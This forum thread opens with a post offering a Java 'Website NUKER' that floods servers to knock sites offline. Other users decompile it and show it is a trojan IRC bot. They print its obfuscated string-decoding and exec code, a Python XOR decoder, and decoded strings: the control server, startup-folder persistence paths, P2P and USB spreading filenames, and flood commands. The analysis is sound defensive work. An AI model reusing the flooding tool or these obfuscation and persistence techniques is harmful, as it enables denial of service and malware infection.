[JAVA] - Website NUKER

For the discussion of Perl, Python, Ruby, and PHP and other interpreted languages.

[JAVA] - Website NUKER

Post by fooibos2 on Mon Feb 16, 2009 7:22 am
([msg=18002]see [JAVA] - Website NUKER[/msg])

Hey everybody,

Width this tool opens as much connections as he can to an address.
While you are opening all those connections the server can't handle it anymore and crashes.
If you will do this more often the website won't by online anymore.

Warning: This software does not work for huge site's width huge server's

Don't look at the weird domain name i didn't have anything else

File link: [Removed]
fooibos2
New User
New User
 
Posts: 1
Joined: Mon Feb 16, 2009 7:18 am
Blog: View Blog (0)


Re: [JAVA] - Website NUKER

Post by godofcereal on Mon Feb 16, 2009 8:46 am
([msg=18003]see Re: [JAVA] - Website NUKER[/msg])

Im sure...
Im off, last year of school and all, I had something longer but char limit fucked that up. So yeah, had a good run here. Thanks for the memories. Thanks to the staff and users.

Best regards, your posting whore,
godofcereal

p.s. Defience, you the man ;)
User avatar
godofcereal
Addict
Addict
 
Posts: 1068
Joined: Wed Aug 20, 2008 6:11 pm
Location: ireland
Blog: View Blog (0)


Re: [JAVA] - Website NUKER

Post by aNewHobby4me on Mon Feb 16, 2009 9:22 am
([msg=18009]see Re: [JAVA] - Website NUKER[/msg])

How about posting your source code?
"To understand recursion you must first understand recursion."
aNewHobby4me
Poster
Poster
 
Posts: 185
Joined: Thu Jan 08, 2009 5:44 pm
Blog: View Blog (0)


Re: [JAVA] - Website NUKER

Post by tgoe on Tue Feb 17, 2009 11:20 am
([msg=18094]see Re: [JAVA] - Website NUKER[/msg])

A quick decompile shows that you've obfuscated the code. Ok
Digging deeper I see that you load an image file into memory:

Code: Select all
// --snip--
try {  InputStream inputstream = (new I()).getClass().getResourceAsStream(""+'I'+'.'+'g'+'i'+'f');
      // --snip--
        while(i != 0)
        {
          int k = inputstream.read(abyte0, j, i);
      // --snip--


Later on is a strange call to exec:
Code: Select all
// --snip--
try {  Runtime runtime = Runtime.getRuntime();
  //   52  127:invokestatic    #10  <Method Runtime Runtime.getRuntime()>
  //   53  130:astore_3       
      runtime.exec((new StringBuilder()).append(I.I(137)).append(System.getProperty(I.I(51))).append(I.I(127)).toString());
  //   54  131:aload_3         
  //   55  132:new             #3   <Class StringBuilder>
  //   56  135:dup             
  //   57  136:invokespecial   #4   <Method void StringBuilder()>
  //   58  139:sipush          137
  //   59  142:invokestatic    #70  <Method String I.I(int)>
  //   60  145:invokevirtual   #6   <Method StringBuilder StringBuilder.append(String)>
// --snip--


Turns out those I.I(int) calls are to a method that returns decoded strings from that image file data:
Code: Select all
// --snip--
public static final synchronized String I(int i)
  {
    int j = i & 0xff;
  //    0    0:iload_0         
  //    1    1:sipush          255
  //    2    4:iand           
  //    3    5:istore_1       
    if(intern[j] != i)
  //*   4    6:getstatic       #2   <Field int[] intern>
  //*   5    9:iload_1         
  //*   6   10:iaload         
  //*   7   11:iload_0         
  //*   8   12:icmpeq          62
    {
      intern[j] = i;
  //    9   15:getstatic       #2   <Field int[] intern>
  //   10   18:iload_1         
  //   11   19:iload_0         
  //   12   20:iastore         
      if(i < 0)
  //*  13   21:iload_0         
  //*  14   22:ifge            30
        i &= 0xffff;
  //   15   25:iload_0         
  //   16   26:ldc1            #3   <Int 65535>
  //   17   28:iand           
  //   18   29:istore_0       
      String s = (new String(getClass, i, getClass[i - 1] & 0xff)).intern();
  //   19   30:new             #4   <Class String>
  //   20   33:dup             
  //   21   34:getstatic       #5   <Field byte[] getClass>
  //   22   37:iload_0         
  //   23   38:getstatic       #5   <Field byte[] getClass>
  //   24   41:iload_0         
  //   25   42:iconst_1       
  //   26   43:isub           
  //   27   44:baload         
  //   28   45:sipush          255
  //   29   48:iand           
  //   30   49:invokespecial   #6   <Method void String(byte[], int, int)>
  //   31   52:invokevirtual   #7   <Method String String.intern()>
  //   32   55:astore_2       
      getResourceAsStream[j] = s;
  //   33   56:getstatic       #8   <Field String[] getResourceAsStream>
  //   34   59:iload_1         
  //   35   60:aload_2         
  //   36   61:aastore         
    }
    return getResourceAsStream[j];
// --snip--

So... why do you even call exec... with encrypted arguments stored in an image file?
User avatar
tgoe
Contributor
Contributor
 
Posts: 633
Joined: Sun Sep 28, 2008 2:33 pm
Location: q3dm7
Blog: View Blog (0)


Re: [JAVA] - Website NUKER

Post by nneonneo on Wed Feb 18, 2009 4:42 pm
([msg=18186]see Re: [JAVA] - Website NUKER[/msg])

This is a typical IRC-controlled bot. The control channel is #foo on irc.h4cky0u.org (port 6667). It does in fact do the server flooding as described, but not under your control.

Command list:

.say (unimplemented)
.flood (server, port, socket count)
.update (no args; reloads and "exec"s the new bot)
.httpflood (server, sleeptime, thread count; tries to DoS a server with multiple simultaneous threads)
.download (url; saves, but doesn't execute the file)
.quit (password; quits if the password is "pHeVoS")
.info (no args; writes the os name, version and Java's service pack level to the channel)
.spread (writes the bot to several P2P programs and connected drives)
.scan (unimplemented)

Oh, not to mention the bot herder's username is fooibos, which means that the original poster likely had a hand in it. I would strongly recommend that he be banned for attempting to pass this sort of shit off.

P.S. @tgoe: the data in the .gif is essentially all the constant strings in the code; effectively, this is an alternate way to intern constant strings. The first three bytes are the filesize, and the rest is strings XORed with the low (least-significant) byte of the filesize.
nneonneo
New User
New User
 
Posts: 5
Joined: Fri Apr 25, 2008 11:01 am
Blog: View Blog (0)


Re: [JAVA] - Website NUKER

Post by tgoe on Wed Feb 18, 2009 9:40 pm
([msg=18201]see Re: [JAVA] - Website NUKER[/msg])

lol i was banging my head on that .gif
User avatar
tgoe
Contributor
Contributor
 
Posts: 633
Joined: Sun Sep 28, 2008 2:33 pm
Location: q3dm7
Blog: View Blog (0)


Re: [JAVA] - Website NUKER

Post by nneonneo on Wed Feb 18, 2009 10:32 pm
([msg=18210]see Re: [JAVA] - Website NUKER[/msg])

I decompiled the I class with jad, which I have found to be quite an effective tool for Java decompilation.

This is what I got:

Code: Select all
// Decompiled by Jad v1.5.8g. Copyright 2001 Pavel Kouznetsov.
// Jad home page: http://www.kpdus.com/jad.html
// Decompiler options: packimports(3)
// Source File Name:   I/I

package I;

import java.io.InputStream;

public class I
{

    public I()
    {
    }

    public static final synchronized String I(int i)
    {
        int j = i & 0xff;
        if(intern[j] != i)
        {
            intern[j] = i;
            if(i < 0)
                i &= 0xffff;
            String s = (new String(getClass, i, getClass[i - 1] & 0xff)).intern();
            getResourceAsStream[j] = s;
        }
        return getResourceAsStream[j];
    }

    static byte getClass[];
    static String getResourceAsStream[] = new String[256];
    static int intern[] = new int[256];

    static
    {
        try
        {
            InputStream inputstream = (new I()).getClass().getResourceAsStream("" + 'I' + '.' + 'g' + 'i' + 'f');
            if(inputstream != null)
            {
                int i = inputstream.read() << 16 | inputstream.read() << 8 | inputstream.read();
                getClass = new byte[i];
                int j = 0;
                byte byte0 = (byte)i;
                byte abyte0[] = getClass;
                while(i != 0)
                {
                    int k = inputstream.read(abyte0, j, i);
                    if(k == -1)
                        break;
                    i -= k;
                    for(k += j; j < k; j++)
                        abyte0[j] ^= byte0;

                }
                inputstream.close();
            }
        }
        catch(Exception exception) { }
    }
}


As you can see, it makes it plainly obvious how the I.gif decoding routine works. I also used Jad on the rest of the source files, then de-interned the strings with a quick Python program I whipped up for that purpose; the entire decompiled source code is quite accessible in this way, and I can even post it if you like (for interests' sake).
nneonneo
New User
New User
 
Posts: 5
Joined: Fri Apr 25, 2008 11:01 am
Blog: View Blog (0)


Re: [JAVA] - Website NUKER

Post by tgoe on Wed Feb 18, 2009 11:02 pm
([msg=18211]see Re: [JAVA] - Website NUKER[/msg])

I think I've got it now :)
After your last post I realized I was making it more complicated than it was.

after:
Code: Select all
#!/usr/bin/env python

import sys

ec = open("I.gif").read()
ki = (len(ec) - 3) & 0x00ff
ec = ec[3:]

for b in ec:
    sys.stdout.write(chr(ord(b) ^ ki))


then:
Code: Select all
$ ./decoder.py | strings > decoded.gif.txt


I got:
Code: Select all
[REMOVED]
regedit /a    user.name   C:\Users\G\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.jar
C:\Documents and Settings\%\Start Menu\Programs\Startup\java.jar
irc.h4cky0u.org
NICK
USER
PING
PONG
JOIN :#foo
fooibos
.say
.flood
.update
.httpflood   .download
File saved
.quit
phEvOs
Quitting
Can't quit
.info
OS:
os.name
   Version:
os.version
   Service pack:
sun.os.patch.level
.spread
.scan   bearshare
c:\DOWNLOADS
d:\DOWNLOADS
e:\DOWNLOADS
f:\DOWNLOADS
limewire'c:\Program Files\Document and Settings\
\Shared'd:\Program Files\Document and Settings\
kazaa'c:\program files\kazaa\my shared folder'd:\program files\kazaa\my shared folder
USB/OTHER-E
USB/OTHER-F
USB/OTHER-G
USB/OTHER-H
USB/OTHER-I
USB/OTHER-J
USB/OTHER-K
USB/OTHER-L
USB/OTHER-M
USB/OTHER-N
USB/OTHER-O
USB/OTHER-P
USB/OTHER-Q
USB/OTHER-R
USB/OTHER-S
USB/OTHER-T
USB/OTHER-U
USB/OTHER-V
USB/OTHER-W
USB/OTHER-X
USB/OTHER-Y
USB/OTHER-Z
192.168.0.
192.168.0.255
\Important.jar   USB/OTHER
\free music.jar
\free games.jar   Found! - & shared directory, copyd files into it$ directory, Could not copy the files
PRIVMSG #foo
User-AgentXMozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9b3) Gecko/2008020514 Firefox/3.0b3
Failed
java -jar
Code reexecuted.
Done flooding
MICRO


Which scratches that itch I had about it being a trojan :D
As for the source, sure. But I've already learned more about java from this than I ever wanted to :lol:

Edit: Removed the URL that was removed in OP :?
User avatar
tgoe
Contributor
Contributor
 
Posts: 633
Joined: Sun Sep 28, 2008 2:33 pm
Location: q3dm7
Blog: View Blog (0)



Return to Interpreted Languages

Who is online

Users browsing this forum: No registered users and 0 guests